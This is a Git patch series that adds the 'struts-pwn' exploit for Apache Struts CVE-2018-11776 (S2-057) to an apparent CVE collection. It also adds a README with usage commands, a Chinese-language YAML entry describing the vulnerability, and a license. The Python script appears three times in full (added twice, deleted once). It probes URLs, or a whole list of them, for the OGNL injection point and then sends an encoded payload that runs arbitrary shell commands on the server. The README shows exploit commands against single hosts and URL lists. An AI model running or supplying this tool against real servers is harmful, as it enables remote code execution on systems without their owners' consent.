From c95f537ca8da6368e2c5172f627da5cd5b89898b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 06:58:47 +0000 Subject: [PATCH 1/9] add cve/apache-Struts/2018/CVE-2018. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md new file mode 100644 index 00000000..e69de29b -- Gitee From 46de3056ba1f1037a1c6fbfb9bca8cf668a560b7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 06:59:37 +0000 Subject: [PATCH 2/9] add cve/apache-Struts/2018. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 54385068cdd8ea0edbf20edf785df0fb047fee97 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:02:02 +0000 Subject: [PATCH 3/9] add py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py @@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. + """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. + injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) -- Gitee From 5ca01f5aaac4ebad6936e1ff71d5a2d01dfa4594 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:01 +0000 Subject: [PATCH 4/9] add cve-2018-11776.py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/cve-2018-11776.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py @@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. + """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. + injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) -- Gitee From 40ac2342a6f0c72930820b0ad83ec81452b9a1bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:12 +0000 Subject: [PATCH 5/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-Struts/2018/CVE-2018-11776/struts-pwn.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ------------------ 1 file changed, 226 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py deleted file mode 100644 index edbf3c5f..00000000 --- a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py +++ /dev/null @@ -1,226 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2018-11776 Exploit -# Author: -# Mazin Ahmed -# This code uses a payload from: -# https://github.com/jas502n/St2-057 -# ***************************************************** - -import argparse -import random -import requests -import sys -try: - from urllib import parse as urlparse -except ImportError: - import urlparse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except Exception: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: 'id')", - action='store', - default='id') -parser.add_argument("--exploit", - dest="do_exploit", - help="Exploit.", - action='store_true') - - -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -cmd = args.cmd if args.cmd else None -do_exploit = args.do_exploit if args.do_exploit else None - -headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Accept': '*/*' -} -timeout = 3 - - -def parse_url(url): - """ - Parses the URL. - """ - - # url: http://example.com/demo/struts2-showcase/index.action - - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - - if ('://' not in url): - url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme - - # Site: http://example.com - site = scheme + '://' + urlparse.urlparse(url).netloc - - # FilePath: /demo/struts2-showcase/index.action - file_path = urlparse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - # Filename: index.action - try: - filename = url.split('/')[-1] - except IndexError: - filename = '' - - # File Dir: /demo/struts2-showcase/ - file_dir = file_path.rstrip(filename) - if (file_dir == ''): - file_dir = '/' - - return({"site": site, - "file_dir": file_dir, - "filename": filename}) - - -def build_injection_inputs(url): - """ - Builds injection inputs for the check. - """ - - parsed_url = parse_url(url) - injection_inputs = [] - url_directories = parsed_url["file_dir"].split("/") - - try: - url_directories.remove("") - except ValueError: - pass - - for i in range(len(url_directories)): - injection_entry = "/".join(url_directories[:i]) - - if not injection_entry.startswith("/"): - injection_entry = "/%s" % (injection_entry) - - if not injection_entry.endswith("/"): - injection_entry = "%s/" % (injection_entry) - - injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. - injection_entry += parsed_url["filename"] - - injection_inputs.append(injection_entry) - - return(injection_inputs) - - -def check(url): - random_value = int(''.join(random.choice('0123456789') for i in range(2))) - multiplication_value = random_value * random_value - injection_points = build_injection_inputs(url) - parsed_url = parse_url(url) - print("[%] Checking for CVE-2018-11776") - print("[*] URL: %s" % (url)) - print("[*] Total of Attempts: (%s)" % (len(injection_points))) - attempts_counter = 0 - - for injection_point in injection_points: - attempts_counter += 1 - print("[%s/%s]" % (attempts_counter, len(injection_points))) - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - continue - if "Location" in resp.headers.keys(): - if str(multiplication_value) in resp.headers['Location']: - print("[*] Status: Vulnerable!") - return(injection_point) - print("[*] Status: Not Affected.") - return(None) - - -def exploit(url, cmd): - parsed_url = parse_url(url) - - injection_point = check(url) - if injection_point is None: - print("[%] Target is not vulnerable.") - return(0) - print("[%] Exploiting...") - - payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) - - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) - - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - return(1) - - print("[%] Response:") - print(resp.text) - return(0) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): - if url: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), "r") - URLs_List = f_file.read().replace("\r", "").split("\n") - try: - URLs_List.remove("") - except ValueError: - pass - f_file.close() - except Exception as e: - print("Error: There was an error in reading list file.") - print("Exception: " + str(e)) - exit(1) - for url in URLs_List: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - print("[%] Done.") - - -if __name__ == "__main__": - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) - except KeyboardInterrupt: - print("\nKeyboardInterrupt Detected.") - print("Exiting...") - exit(0) -- Gitee From 90a543a09a863da4a8e6cd707699354fc48c955b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:24 +0000 Subject: [PATCH 6/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-Struts/2018/CVE-2018-11776/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md deleted file mode 100644 index e69de29b..00000000 -- Gitee From 252661bfba790e081d4c3537e21c3dc4097297fa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:45 +0000 Subject: [PATCH 7/9] add readme MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/LICENSE.txt | 22 +++++++++ .../2018/CVE-2018-11776/README.md | 48 +++++++++++++++++++ .../2018/CVE-2018-11776/requirements.txt | 1 + 3 files changed, 71 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/requirements.txt diff --git a/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt new file mode 100644 index 00000000..017f1bd2 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2018 Mazin Ahmed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md new file mode 100644 index 00000000..34ca25d9 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/README.md @@ -0,0 +1,48 @@ +*struts-pwn - CVE-2018-11776 Exploit* +============ + +### An exploit for Apache Struts CVE-2018-11776 ### + + +# **Usage** # + +## Check if the vulnerability exists against a single URL. ## +`python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'` + +## Check if the vulnerability exists against a list of URLs. ## +`python struts-pwn.py --list 'urls.txt'` + +## Exploit a single URL. ## +`python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'` + +## Exploit a list of URLs. ## +`python struts-pwn.py --exploit --list 'urls.txt' -c 'id'` + + +# **Demo** # +![Demo](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Demo.gif) + +![Screenshot 1](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_1.png) + +![Screenshot 2](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_2.png) + + +# **Requirements** # +* Python2 or Python3 +* requests + + +# **Legal Disclaimer** # +This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. + + +# **License** # +The project is licensed under MIT License. + + +# **Author** # +*Mazin Ahmed* +* Website: [https://mazinahmed.net](https://mazinahmed.net) +* Email: *mazin AT mazinahmed DOT net* +* Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) +* Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) diff --git a/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt new file mode 100644 index 00000000..f2293605 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt @@ -0,0 +1 @@ +requests -- Gitee From f66e22650e42e591aff87f8b7d5ba0965f79dcf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:09:19 +0000 Subject: [PATCH 8/9] update cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/yaml/CVE-2018-11776.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml index e69de29b..d66c1fe0 100644 --- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml +++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml @@ -0,0 +1,20 @@ +id: CVE-2018-11776 +source: https://github.com/mazen160/struts-pwn_CVE-2018-11776 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: high + description: + Apache Struts 版本 2.3 到 2.3.34 和 2.5 到 2.5.16 在 alwaysSelectFullNamespace 为 true 时(由用户或像 Convention 插件这样的插件)遭受可能的远程代码执行,然后: 结果在没有命名空间的情况下使用,同时,它的上层包没有或通配符命名空间,类似于结果,当使用没有设置值和操作的 url 标签时,同样的可能性同时, 它的上层包没有或通配符命名空间。 + scope-of-influence: + Struts 2.3.1 - Struts 2.3.34 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2018-11776 + cwe-id: CWE-20 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 \ No newline at end of file -- Gitee From 0db7783334bf9883ad7cc25a13d879403ff7752e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 09:18:02 +0000 Subject: [PATCH 9/9] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 545fab5b..a83a830a 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -31,6 +31,8 @@ cve: - CVE-2022-22947 apache-commons-text: - CVE-2022-42889 + apache-Struts: + - CVE-2018-11776 unzip: - CVE-2022-0529 django: -- Gitee